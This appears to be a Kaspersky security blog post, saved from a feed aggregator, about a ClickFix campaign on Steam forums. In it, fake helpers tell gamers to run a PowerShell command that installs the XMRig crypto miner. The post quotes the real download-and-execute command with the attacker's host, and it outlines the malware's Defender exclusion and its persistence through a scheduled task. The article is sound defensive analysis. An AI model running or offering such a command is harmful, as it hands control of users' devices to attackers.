惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Google DeepMind News
Google DeepMind News
L
LangChain Blog
H
Help Net Security
博客园_首页
T
Tailwind CSS Blog
Microsoft Security Blog
Microsoft Security Blog
T
The Blog of Author Tim Ferriss
雷峰网
雷峰网
Recent Announcements
Recent Announcements
D
DataBreaches.Net
U
Unit 42
Vercel News
Vercel News
I
InfoQ
Martin Fowler
Martin Fowler
Microsoft Azure Blog
Microsoft Azure Blog
Apple Machine Learning Research
Apple Machine Learning Research
S
SegmentFault 最新的问题
Jina AI
Jina AI
博客园 - 叶小钗
博客园 - 【当耐特】
罗磊的独立博客
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
月光博客
月光博客
Last Week in AI
Last Week in AI

Kaspersky official blog

Protecting your smart TV and set-top box from hacking ChatGPT Computer History: the risks and a safe setup How to completely uninstall apps on Mac and free up storage GPUThor: an evolution of the Rowhammer idea Hacking the Boeing 737: inside the Bus Driver attack | Kaspersky official blog Getting AI for schoolwork right: 25 helpful prompts + usage tips This Android malware steals banking credentials even without an internet connection Detection blind spots: non-standard file formats in malicious email campaigns What to do if you find someone else's bank card How to spot scam websites that your browser says are safe Malware in car infotainment systems: how infection occurs How to protect yourself from webcam spying: five simple steps How to tell an AI-written book from an expert's What we know about the cryptocurrency theft through Adform ads Detection blind spots: polyglot file formats in mass mailings and targeted attacks Dangerous email attachments: the files you should never open Acoustic keylogging How to prevent autonomous agents from breaching corporate infrastructure CrashStealer, a new infostealer for macOS: how it works and how to stay safe How to ensure compatibility between security solutions and the new platform Why do people (and robots) call but stay silent? ScreenConnect leveraged in cyberattacks ClickFix on macOS: how the Terminal-based attack works, and how to protect yourself Why live chat agents can read your messages before you hit “Send” Real-world attacks on corporate AI agents How Google phone number verification works, and whether you should turn it off ConsentFix: a new ClickFix variation for compromising Microsoft 365 accounts How to protect your data after a breakup Email hijacking via OAuth Prompt attacks on the Gemini AI-assistant and Google Workspace with Gemini
ClickFix on Steam forums: how malicious PowerShell comman...
Alanna Titterington · 2026-08-17 · via Kaspersky official blog

This year has seen a real boom in ClickFix attacks. It’s such a hit with criminals that we barely finish writing about one variation before it’s time to cover the next.

This time, attackers are targeting gamers: tech journalists spotted posts pushing malicious tips on Steam forums. Here’s what these posts look like, what malware they’re used to spread, and how to keep your device safe.

ClickFix finds its way onto Steam forums

Many gamers turn to their fellow players on Steam forums for help and advice on things like beating a tricky quest, leveling up, scoring the best loot, or working around a bug. And it’s precisely this trust in community advice that attackers have decided to exploit.

The attack starts when criminals reply to someone’s question about game crashes, missing inventory items, or other technical issues. Posing as helpful commenters, they suggest opening PowerShell as an administrator and running a command that supposedly fixes the issue the user is having.

A malicious actor's post on a Steam forum

Disguising their post as troubleshooting advice, the malicious actor suggests running PowerShell as an administrator and executing a command that supposedly fixes the user’s issue. Source

As you might guess, running the command doesn’t fix anything — it just opens a whole new can of worms. That’s the whole idea behind ClickFix: using social engineering to trick victims into carrying out unsafe actions themselves while giving the scammers what they need to compromise the device. We’ve covered other ClickFix tricks before — fake CAPTCHAs, bogus browser errors, and more — all of which rely on getting the victim to run the malicious command on their own. You can read more about the different variations of ClickFix attacks in our earlier post.

The guile of using ClickFix on Steam forums is that the attack may hit not only the player who asked for help; plenty of other gamers who run into the same issue and find the answer via a Google search can fall for it too.

A quick primer: what’s really behind the irm | iex command

Before we get into what attackers actually trick gamers into installing this way, we need to cover some technical background. So, first off, the posts on Steam forums advise unsuspecting would-be victims to run the following command in PowerShell:

irm msfconfig.icu | iex

To someone not intimately familiar with PowerShell, this line might look fairly innocuous — it resembles launching MSConfig, Windows’ built-in system configuration utility, with a few extra parameters.

In reality, though, it’s anything but harmless. Let’s break down what each part of this command actually does:

  1. irm is short for the built-in PowerShell command Invoke-RestMethod. It reaches out to the web address specified later in the line and retrieves data in response.
  2. icu is that web address — not the name of some local file as it might appear at first glance. This is the attackers’ server, and it responds to the irm request with a malicious PowerShell script.
  3. iex is another built-in PowerShell command, Invoke-Expression. It takes whatever irm receives from that web address and executes it as PowerShell code.

Once run, this line of PowerShell code downloads a script from the specified site and immediately executes it. As one Reddit user rightly pointed out, you can safely find out what code would actually be downloaded to your device — without the risk of it running — just by deleting the second part, iex. Without it, the command will simply download the script’s contents and print them to the PowerShell window without executing them. This gives you the full, unobscured code that you’re being asked to run on your device. Next, let’s look at what these helpful Steam forum posters are actually trying to get gamers to install on their machines.

A crypto miner, not an optimization tool

The attackers did their homework: the PowerShell script downloaded from their server does a convincing job of mimicking a Windows optimization utility. Once launched, it shows the user a series of notifications claiming to clear temporary files, flush the DNS cache, update drivers, check the disk for errors, disable unnecessary startup apps, scan the system for malware, repair the Windows image, and verify system file integrity.

Fake Windows optimization in progress

The script displays a stream of messages about various fake optimization tasks to make it look like it’s doing useful maintenance. Source

The real activity, meanwhile, happens behind the scenes. The script starts by checking whether it’s running with administrator privileges. If it is, it creates a hidden working folder at C:\Windows\Background, and adds it to Microsoft Defender’s exclusion list. From that point on, any files placed in that folder cease to be scanned by Windows’ built-in antivirus.

Next, the script preps the system for the next stage of the attack and downloads an executable from the attackers’ server — saving it into that same C:\Windows\Background folder under the legitimate-sounding name system.exe.

The downloaded file is XMRig, one of the most popular tools for mining the Monero cryptocurrency. XMRig itself isn’t malware; it’s a legitimate, open-source mining tool. The problem is that attackers install it on victims’ computers without their knowledge. Once it’s running, the device’s computing power gets hijacked for Monero mining, with the resulting cryptocurrency going straight to the criminals.

This makes gamers’ rigs especially appealing targets: modern gaming PCs pack powerful CPUs and GPUs — exactly the kind of hardware that’s great for mining crypto.

To make sure the malware survives a reboot, the script also creates a new task in Windows Task Scheduler: XMRig-{computer name}. From then on, it automatically launches the crypto miner every time the system starts up.

How to protect your device from crypto miners and other malware

Unfortunately, many gamers are reluctant to install security software — or keep it running — on their devices. The main culprit is the persistent myth that “an antivirus slows down your game”. We’ve covered research on this on our blog before, and the results showed no significant performance hit from running an antivirus while playing.

The same can’t be said for crypto miners, though — they definitely hurt performance, and they wear down your hardware faster to boot. So what can you do to keep your gaming PC and accounts out of harm’s way?

  • Avoid running PowerShell, Terminal, or other command prompt scripts that strangers suggest you copy and execute — whether on forums, in chats, or in comments.
  • Before hitting Enter on any command you don’t fully understand, look up what it does and the potential fallout from running it.
  • Use a reliable security solution with a gaming mode that will flag malware download attempts in time and block them from running.
  • Don’t turn off protection while you play. Using a solution with a dedicated gaming mode is the way to go. Kaspersky security products automatically activate that mode as soon as a game launches, holding off antivirus database updates, notifications, and scheduled disk scans until you’re done playing.

Curious how else attackers target gamers? Check out our other posts: